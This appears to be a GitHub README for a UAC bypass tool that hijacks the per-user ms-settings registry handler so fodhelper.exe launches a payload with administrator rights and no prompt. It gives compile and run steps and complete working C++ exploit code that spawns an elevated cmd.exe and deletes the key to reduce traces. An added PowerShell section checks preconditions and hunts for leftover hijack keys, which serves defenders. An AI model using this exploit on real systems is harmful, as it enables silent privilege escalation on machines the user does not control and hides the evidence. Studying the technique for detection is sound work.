A minimalistic UAC bypass using the Windows fodhelper.exe auto-elevation trick. Pure registry hijack, no prompts, silent power move.

offnet-sh/autoelevate-exploit


autoelevate-exploit

A minimalistic UAC bypass exploit leveraging Windows' built-in fodhelper.exe auto-elevation.
It hijacks the ms-settings: protocol handler by writing HKCU\Software\Classes\ms-settings\Shell\Open\command, so that fodhelper.exe launches a custom payload with a high-integrity (administrator) token and no UAC prompt is shown.
Like every fodhelper-style bypass, it applies only to accounts that are members of the local Administrators group and are running at medium integrity under the default UAC setting; it does not escalate a standard user, and it does not work when UAC is set to "Always notify".


How It Works

  • fodhelper.exe (the Features on Demand helper) is a Microsoft-signed binary in System32 whose manifest declares autoElevate=true, so the Application Information service (AppInfo) elevates it without a consent prompt for administrators at the default UAC level.
  • On start, fodhelper opens the ms-settings: URI handler. Windows resolves that handler through the merged HKEY_CLASSES_ROOT view, where HKCU\Software\Classes shadows HKLM\Software\Classes, and the current user's Classes hive is writable at medium integrity. Writing Shell\Open\command there, together with an empty DelegateExecute value, makes the shell run our command line instead of the real COM handler.
  • Launching fodhelper.exe therefore executes the payload defined in the registry with fodhelper's elevated token (high integrity).
  • After execution the hijack key is deleted to reduce on-disk traces. The key write itself is a well-known indicator: Microsoft Defender and most EDRs alert on it, and Sysmon Event ID 12/13 on that key path is a standard detection.

Usage

  1. Compile the C++ code, linking against advapi32 and shell32 (e.g. cl.exe with those libraries, or MinGW g++ with -ladvapi32 -lshell32).
  2. Run the executable from a non-elevated (medium-integrity) context as a user who is a member of the local Administrators group, with UAC at its default level. A standard user account is not escalated, and "Always notify" disables auto-elevation.
  3. The payload (default is cmd.exe) launches with a high-integrity administrator token, with no UAC prompt.
  4. The hijack key is deleted automatically after a two-second delay; the spawned payload keeps running. On a slow host, fodhelper may not have read the key before it is removed, in which case nothing launches.
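Before running the tool on a test host, and when verifying its cleanup afterwards, the following PowerShell is an added example (editor-supplied, not part of this project) that checks the preconditions the two sections above rely on: that the caller holds a filtered administrator token, that UAC is not set to "Always notify", that fodhelper.exe still declares autoElevate and is signed, and that no ms-settings hijack key remains in any loaded user hive. The registry value semantics (ConsentPromptBehaviorAdmin 0/2/5, EnableLUA) are Microsoft's documented UAC policy values; the function names are my own.

```powershell
# Added pre-flight and post-run checks for the fodhelper hijack described above.
# Editor-supplied example code, not part of the autoelevate-exploit project.
# Run it from a NON-elevated PowerShell 5.1+ session on the test machine.

function Test-FodhelperPreconditions {
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $prin = New-Object Security.Principal.WindowsPrincipal($id)

    # Token state. With UAC on, an administrator's medium-integrity token carries the
    # Administrators SID as deny-only, so IsInRole() is false while the SID is still listed.
    # That "split token" is the only state this technique escalates.
    $adminSid   = 'S-1-5-32-544'
    $elevated   = $prin.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $inAdmins   = $id.Groups.Value -contains $adminSid
    $tokenState = if ($elevated) { 'already high integrity (nothing to bypass)' }
                  elseif ($inAdmins) { 'filtered admin token (bypass applies)' }
                  else { 'standard user (fodhelper prompts for credentials; bypass fails)' }

    # UAC policy. ConsentPromptBehaviorAdmin: 2 = "Always notify" (auto-elevation disabled),
    # 5 = default, 0 = elevate without prompting. EnableLUA = 0 means UAC is off entirely.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $uacState = if ($pol.EnableLUA -eq 0) { 'UAC disabled' }
                elseif ($pol.ConsentPromptBehaviorAdmin -eq 2) { 'Always notify: autoElevate ignored, bypass fails' }
                elseif ($pol.ConsentPromptBehaviorAdmin -in 0, 5) { 'silent auto-elevation allowed' }
                else { "non-default policy ($($pol.ConsentPromptBehaviorAdmin)); verify on this build" }

    # The binary itself: autoElevate must be declared in the embedded manifest and the file
    # must be Microsoft-signed (System32 binaries are catalog-signed) or AppInfo will not elevate it.
    $fod  = Join-Path $env:SystemRoot 'System32\fodhelper.exe'
    $text = [Text.Encoding]::ASCII.GetString([IO.File]::ReadAllBytes($fod))
    $autoElevate = $text -match '<autoElevate[^>]*>\s*true\s*</autoElevate>'
    $sigStatus   = (Get-AuthenticodeSignature -FilePath $fod).Status

    [pscustomobject]@{
        TokenState  = $tokenState
        UacState    = $uacState
        AutoElevate = $autoElevate
        Signature   = $sigStatus
    }
}

function Find-MsSettingsHijack {
    # Post-run check, and a hunting query for defenders: list every loaded user hive that still
    # carries the hijack key. HKCU\Software\Classes is a link to HKU\<SID>_Classes (UsrClass.dat),
    # so the artifact lives there rather than in NTUSER.dat; both views are checked.
    Get-ChildItem 'Registry::HKEY_USERS' | ForEach-Object {
        $hive = $_.PSChildName
        $sub  = if ($hive -like '*_Classes') { 'ms-settings\Shell\Open\command' }
                else { 'Software\Classes\ms-settings\Shell\Open\command' }
        $key  = "Registry::HKEY_USERS\$hive\$sub"
        if (Test-Path $key) {
            $v = Get-ItemProperty -Path $key
            [pscustomobject]@{
                Hive            = $hive
                Command         = $v.'(default)'
                DelegateExecute = $null -ne $v.PSObject.Properties['DelegateExecute']
            }
        }
    }
}

Test-FodhelperPreconditions | Format-List
$hits = @(Find-MsSettingsHijack)
if ($hits.Count) { $hits | Format-Table -AutoSize } else { 'No ms-settings hijack key present in any loaded hive.' }
```

Run Test-FodhelperPreconditions first: only the combination "filtered admin token" plus "silent auto-elevation allowed" plus AutoElevate True is the state the tool escalates. Run Find-MsSettingsHijack after the tool exits; an empty result confirms the cleanup in step 4, and any hit shows the exact command line that was planted, which is also what a defender would pull from Sysmon Event ID 13 for that key path.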

Disclaimer

This project is for educational purposes only.
Misuse can cause serious harm and is illegal. Use responsibly and only in controlled environments you own or have explicit permission to test.


Stay sharp, use power wisely.


Example

```cpp
#include <windows.h>
#include <string.h>
// Same hijack as described above. Link against advapi32 and shell32.
int main(void) {
    HKEY hKey;
    RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", &hKey);  // per-user key shadows HKLM in HKCR
    RegSetValueExA(hKey, "", 0, REG_SZ, (const BYTE*)"C:\\Windows\\System32\\cmd.exe", (DWORD)strlen("C:\\Windows\\System32\\cmd.exe") + 1);  // payload
    RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (const BYTE*)"", 1);  // empty value: run the command line, not the COM handler
    RegCloseKey(hKey);
    ShellExecuteA(NULL, "open", "C:\\Windows\\System32\\fodhelper.exe", NULL, NULL, SW_HIDE);  // auto-elevates and launches the payload
    Sleep(2000);  // give fodhelper time to read the key before it is removed
    RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command");  // cleanup
    return 0;
}
```
